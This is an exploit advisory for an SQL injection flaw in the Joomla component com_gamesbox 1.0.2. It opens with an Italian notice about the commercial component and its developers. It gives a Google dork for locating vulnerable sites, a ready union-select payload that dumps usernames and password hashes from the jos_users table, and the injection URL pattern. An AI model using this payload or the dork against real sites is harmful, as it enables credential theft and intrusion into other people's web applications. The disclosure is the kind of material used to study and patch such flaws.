Componente commerciale
Per aggiornamenti utilizzare il supporto degli sviluppatori del componente
-----------------------------------------------------------------------
Joomla Component com_gamesbox 1.0.2 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Gamesbox
Version : 1.0.2 Lower versions may also be affected
Vendor : http://www.jooforge.com/
License : GPL
Google Dork : inurl:com_gamesbox
Description :
Gamesbox is the innovative component developed for Joomla™ that allows
you to manage a real and unique portal for videogames.
----------------------------------------------------------------
Exploit:
~~~~~~~
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8+from+jos_users--
Poc:
~~~~~~~
http://127.0.0.1/[path]/index.php?option=com_gamesbox&view=consoles&layout=console&id=[SQLi]
----------------------------------------------------------------
WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com
---------------------------[EOF]--------------------------------
